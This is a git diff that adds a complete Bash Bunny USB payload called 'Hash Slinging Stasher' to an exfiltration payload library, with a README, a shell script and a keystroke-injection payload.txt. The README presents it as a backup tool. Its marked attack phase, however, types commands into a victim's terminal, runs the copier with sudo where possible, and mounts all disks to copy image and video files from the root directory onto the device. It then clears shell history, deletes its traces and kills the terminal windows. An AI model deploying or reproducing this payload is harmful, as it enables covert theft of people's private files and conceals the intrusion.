diff --git a/payloads/library/exfiltration/HashSlingingStasher/README.md b/payloads/library/exfiltration/HashSlingingStasher/README.md new file mode 100755 index 00000000..5138fffb --- /dev/null +++ b/payloads/library/exfiltration/HashSlingingStasher/README.md @@ -0,0 +1,85 @@ +
+NNNNNNNNNNNNNNNX0kxol:;'.....     ...,:lkKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNNNNN0xl:,..                      .,:o0NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNNNOl'.                              .,xXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNKo.                                   .lKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNN0:                                      .cKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNK;                                        .lKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNXc                                          .dNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNo.                                           ,ONNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNO'                                            .lXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNXc                                              ;0NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNO'                                              'ONNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNo                                               .;ccccccccccllloodxOXNNNNNNNNNNNNNN
+NK;                                     .....                        .cKNNNNNNNNNNNNN
+NO'                                                                   .xNNNNNNNNNNNNN
+Nx.                   H A S H                   .               ...   .ONNNNNNNNNNNNN
+Nd.                                             ......        .....   lXNNNNNNNNNNNNN
+Nl                 S L I N G I N G               ......       ...    ;0NNNNNNNNNNNNNN
+Xc                                                 ..               ,ONNNNNXK0KXNNNNN
+K;                  S T A S H E R                                 .cKNNNNN0dc;:cldkKX
+K,                                                              .:kXNNNNXxcdd:co:,,:o
+O'                       by                                  .;o0XNNNNNKocddcd0x::c;;
+k.                                                 ....',:ldkKNNNNNNNNOccoclkkl:oxl:x
+x.                     theSW4n                    .l0KKXNNNNNNNNNNNNNKl,:;lko:ldl:lOX
+d                                                 .lXNNNNNNNNNNNNNNNNX0o,,:::ol;cxKNN
+l                                                  .:ok0XXXK0OxdldKNNKxlldoc:;cxKNNNN
+c                                                     ..,;,'..    ;xdcoOXNNK00XNNNNNN
+;                                                                  .:OXNNNNNNNNNNNNNN
+,                                                                   lNNNNNNNNNNNNNNNN
+'                                                                   cXNNNNNNNNNNNNNNN
+.                                                               .':o0NNNNNNNNNNNNNNNN
+.           ..                                     ..''''',;:cox0XNNNNNNNNNNNNNNNNNNN
+            ..                                     .xNXXXXNNNNNNNNNNNNNNNNNNNNNNNNNNN
+           ...                                     .dNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+          ....                                     .xNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+.         ....                                   .;dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+Ko.       ......                            .';cd0XNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+Nk,.        .oKk,       ....';:col.        .;OXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNXOdl;..   'ONNd.      ....';cxXNl          .;dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNXOxl;oXNN0:.... .....',:xXN0l,........';dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNNNNNXXNNNNXK0OOOOO00KXXNNNNNNXXKKKKKKXXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+
+ +HSS is a data backup tool for MacOS and Linux targets (tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3) (not compatible with Windows). It is designed to find and copy user defined file types/sizes to the udisk on the Bash Bunny, and keep track of them using checksums. This allows the user to scan, stop, and revisit the target to resume copying only new files, skipping those previously copied. + +# Instructions + +If using a MicroSD XC card for your Bash Bunny Mark II, format it using FAT32 and name it "BashBunny". + +Variables/options are set in payload.txt. By default, the script will recursively search the root directory of the target OS for image and video file extensions and copy only files greater than 10KB in size. + +Copy the payload.txt and hss_bbscript.sh into the payload/switch folder on the Bash Bunny. If you have an existing checksums.txt file (a list of checksums for files which have been copied previously) you want to use, make sure to copy it to .../BashBunny/loot/hss/ on the Bash Bunny as well (or on the SD card if applicable). The list should contain one CRC-32 checksum per line. + +Backup checksums.txt after running HSS and name it something specific so that you know which target it corresponds to. You probably wouldn't want to use the same list on multiple targets, especially if there is a low chance of them containing the same files, because the script will take longer to parse the irrelevant checksums from the existing list. But this depends on your use case. If you want to return to a specific target at a later time, just copy and rename the corresponding checksums file back to "checksums.txt" in the loot directory, and pick up where you left off (looking for new/modified files). + +If the script completes its scan of the target system, it will create a file called "nosferatu" in the loot directory. Otherwise you may simply come back and run the HSS script again to resume scanning at any time. nosferatu is deleted at the beginning of each scan, if it exists on the Bash Bunny already. + +Unplug the Bash Bunny device when the script is finished, or at any time if you wish to return and finish later. You may now move the files off of the device for storage elsewhere, if desired. Leave the checksums.txt file inside the loot directory on the device if the script did not complete. The script will pick up where it left off, skipping over any files that were copied before (as long as checksums.txt is left on the device). + +# Nuances +The tool will attempt to mount all connected disks and run as super user if possible (better results), unmounting whatever was not previously mounted before, once the script completes. + +If an unsupported filesystem is connected, you may instead run the script from a bootable USB OS attached to the target, which supports the desired filesystem. + +MacOS Time Machine backups and hidden ".Trashes" folders can not be accessed by running this script from the local machine running MacOS, unless full disk access has been granted to the termial application. You can do this relatively quickly (if you have the password to the user logged in) by pressing command + space, type "full disk access" and press return, then click the toggle to enable Terminal if it is not already enabled. Don't forget to turn it off afterwards if you go this route. + +If you unplug the Bash Bunny before the script finishes, and then modify payload.txt, you will have to manually delete the .../BashBunny/HSS directory for the changes to take effect. + +# LED Status Indicators (Standard) +SETUP.... Magenta solid + +ATTACK... Yellow single blink + +FINISH... Green 1000ms VERY FAST blink followed by SOLID + +# hss_checksummer.sh +### To manually generate or update your checksum list for files which you have already copied + +Manually run this script in the parent directory above a directory called "backup" containing files you want to add to a checksums.txt list. Then take the checksums.txt file and place it in .../loot/hss/ to prevent the files from being copied to the .../loot/hss/backups/ directory the next time HSS is run. + +# hss_cleanup.sh +### To manually perform cleanup functions on the loot directory + +Manually run this script inside the .../loot/hss/ directory to unhide hidden files, and sort files into directories based on their file extension inside the loot directory. diff --git a/payloads/library/exfiltration/HashSlingingStasher/hss_bbscript.sh b/payloads/library/exfiltration/HashSlingingStasher/hss_bbscript.sh new file mode 100755 index 00000000..769cf69a --- /dev/null +++ b/payloads/library/exfiltration/HashSlingingStasher/hss_bbscript.sh @@ -0,0 +1,76 @@ +#!/bin/bash + +# Variables (defined by user in payload.txt) +mountpt=$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3) +lootdir=$mountpt/loot/hss + +###### Create loot directory and remove nosferatu if it already exists, which serves as the indicator whether or not the script has fully completed in the past ###### + +mkdir -p $lootdir +cd $lootdir +rm nosferatu +mkdir ./backup +touch ./checksums.txt +chmod 777 ./backup/ ./checksums.txt + +mounted=" " +mntdir=" " + +###### Mount all unmounted, connected drives and store theier device name to unmount them again at the end of the script ###### + +# For MacOS +if uname | grep -i darwin; then for i in `ls /dev | awk -v s="disk" 'index($0, s) == 1'`; do if diskutil info $i | grep -i "Mounted" | grep -qi "Yes"; then :; else mounted+="$i " && diskutil mountDisk $i; fi; done; fi + +# For Linux +if uname | grep -i darwin; then :; else +partitions=$(lsblk -o NAME,MOUNTPOINT -nr) +while IFS= read -r line; do + name=$(echo "$line" | awk '{print $1}') + mountpoint=$(echo "$line" | awk '{print $2}') + # Check if the partition is not mounted + if [ -z "$mountpoint" ]; then + # Attempt to mount the partition + udisksctl mount -b "/dev/$name" && mounted+="/dev/$name " + fi +done <<< "$partitions" +fi + +###### Find all files under a given directory of a given size and filetype, copy the files to a folder on the USB drive, and save their checksums to a running list ###### +find "$target_directory" -path "$mountpt/loot/hss" -prune -o -size $find_file_size -type f \( -name "" `for i in ${target_extensions[@]}; do echo "-o -iname "*.$i" "; done` \) -exec echo {} ';' | while read p; do + if cat ./checksums.txt | grep -qw `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1`; then + : + else + if [ -f "./backup/${p##*/}" ]; then + cp "$p" "./backup/`cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1`_${p##*/}" + if [ $? -ne 0 ] ; then + # Provide indication the drive was full, and unmount only the disks that were mounted at the beginning of the script + touch ./disk_drive_full + if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi + if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi + exit 1 + else + echo `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1` >> ./checksums.txt + fi + else + cp "$p" "./backup/" + if [ $? -ne 0 ] ; then + # Provide indication the drive was full, and unmount only the disks that were mounted at the beginning of the script + touch ./disk_drive_full + if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi + if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi + exit 1 + else + echo `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1` >> ./checksums.txt + fi + fi + fi +done + +###### Unmount only the disks that were mounted at the beginning of the script, and provide indication that the script completed successfully ###### +if [ $? -ne 0 ] ; then + : +else + if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi + if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi + touch nosferatu +fi diff --git a/payloads/library/exfiltration/HashSlingingStasher/hss_checksummer.sh b/payloads/library/exfiltration/HashSlingingStasher/hss_checksummer.sh new file mode 100755 index 00000000..fbe19ead --- /dev/null +++ b/payloads/library/exfiltration/HashSlingingStasher/hss_checksummer.sh @@ -0,0 +1,5 @@ +#!/bin/bash -x + +# Run this script in the parent directory above the "backup" folder containing files you want to add to a checksums.txt list. Then take the checksums.txt file and place it in .../loot/hss/ to prevent the files from being copied to the .../loot/hss/backups/ directory the next time HSS is run. + +find ./backup | while read p; do if cat ./checksums.txt | grep -qw `cksum "$(echo "$p" | tr -d '\')" | cut -d ' ' -f1`; then : ; else echo `cksum "$(echo "$p" | tr -d '\')" | cut -d ' ' -f1` >> ./checksums.txt; fi; done \ No newline at end of file diff --git a/payloads/library/exfiltration/HashSlingingStasher/hss_cleanup.sh b/payloads/library/exfiltration/HashSlingingStasher/hss_cleanup.sh new file mode 100755 index 00000000..17ad2d96 --- /dev/null +++ b/payloads/library/exfiltration/HashSlingingStasher/hss_cleanup.sh @@ -0,0 +1,7 @@ +#!/bin/bash -x + +# Run this script inside the .../loot/hss/ directory to perform cleanup functions on the loot directory: unhide hidden files, and sort files into directories based on their file extension + +find ./backup/ -type f -name '\.*' -print | while read p; do mv $p ./backup/`echo $p | cut -b 11-`; done +ls ./backup/ | while read p; do mkdir ./backup/"${p##*.}"; done +ls ./backup/ | while read p; do mv ./backup/"$p" ./backup/"${p##*.}"/; done \ No newline at end of file diff --git a/payloads/library/exfiltration/HashSlingingStasher/payload.txt b/payloads/library/exfiltration/HashSlingingStasher/payload.txt new file mode 100755 index 00000000..5f40969a --- /dev/null +++ b/payloads/library/exfiltration/HashSlingingStasher/payload.txt @@ -0,0 +1,175 @@ +# Title: Hash Slinging Stasher for Bash Bunny +# Description: Copies files to Bash Bunny udisk from the target OS matching given extensions and file size only if their checksum does not appear in a user defined or generated checksum list, and appends the checksum of copied files to that list. +# Author: theSW4n +# Version: 1.0 +# Category: Exfiltration +# Target: Tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3 (not compatible with Windows) +# Attackmodes: HID, Storage + +# Options +hss_target_directory=/ +hss_target_extensions="jpg jpeg gif bmp raw webp psd orf rw2 flv webm ogg h264 hevc heic heif dng cr2 tiff crw nef pef mov qt mp4 m4p m4v mpg mpe mpv m2v svi 3gp 3g2 mpeg avi wmv mts m2ts ts png" +hss_find_file_size=+10k +DRIVE_LABEL="BashBunny" + +######## SETUP PHASE ######## +LED SETUP +GET SWITCH_POSITION +mount /dev/nandf /root/udisk +rm -rf /root/HSS +cp -r /root/udisk/payloads/${SWITCH_POSITION} /root/HSS +sync +umount /dev/nandf +udisk mount +mv -f /root/HSS /root/udisk/HSS +sync +udisk umount +ATTACKMODE HID STORAGE + +######## ATTACK PHASE ######## +LED ATTACK +QUACK GUI SPACE +QUACK GUI +QUACK STRING "terminal" +QUACK ENTER +QUACK DELAY 1500 +QUACK STRING "qterminal" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "gnome-terminal" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "xterm" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "konsole" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "lxterminal" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "urxvt" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "st" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "alacritty" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "xfce4-terminal" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "tilda" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "udisksctl mount -b /dev/disk/by-label/$DRIVE_LABEL" +QUACK ENTER +QUACK DELAY 1500 +QUACK STRING "cp -rf \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)/HSS /tmp" +QUACK ENTER +QUACK DELAY 1500 +QUACK STRING "chmod -R 755 /tmp/HSS" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "cd /tmp/HSS" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "/bin/bash" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "target_directory=$hss_target_directory" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "export target_directory" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "target_extensions=\""$hss_target_extensions\""" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "export target_extensions" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "find_file_size=$hss_find_file_size" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "export find_file_size" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "DRIVE_LABEL=$DRIVE_LABEL" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "export DRIVE_LABEL" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "if [ \""\$EUID\"" -ne 0 ]; then \$(find ~+ -name" +QUACK STRING " \""hss_bbscript.sh\""); else \$(sudo \$(find ~+ -name" +QUACK STRING " \""hss_bbscript.sh\"")); fi" +QUACK ENTER +QUACK DELAY 1000 +sync + +QUACK STRING "exit" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "export HISTIGNORE=\""*\""" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "cd /" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "rm -rf /tmp/HSS" +QUACK ENTER +QUACK DELAY 1500 +QUACK STRING "rm -rf \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)/HSS" +QUACK ENTER +QUACK DELAY 1500 +QUACK STRING "udisksctl unmount -b /dev/disk/by-label/$DRIVE_LABEL" +QUACK ENTER +QUACK DELAY 1500 +QUACK STRING "diskutil eject \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)" +QUACK ENTER +QUACK DELAY 2000 +QUACK STRING "unset target_directory & unset target_extensions & unset find_file_size & unset DRIVE_LABEL" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "history -c && history -w" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "killall qterminal & killall gnome-terminal- & killall Terminal & killall xterm & killall konsole & killall lxterminal & killall urxvt & killall st & killall alacritty & killall xfce4-terminal & killall tilda" +QUACK ENTER +QUACK DELAY 500 +sync + +LED FINISH +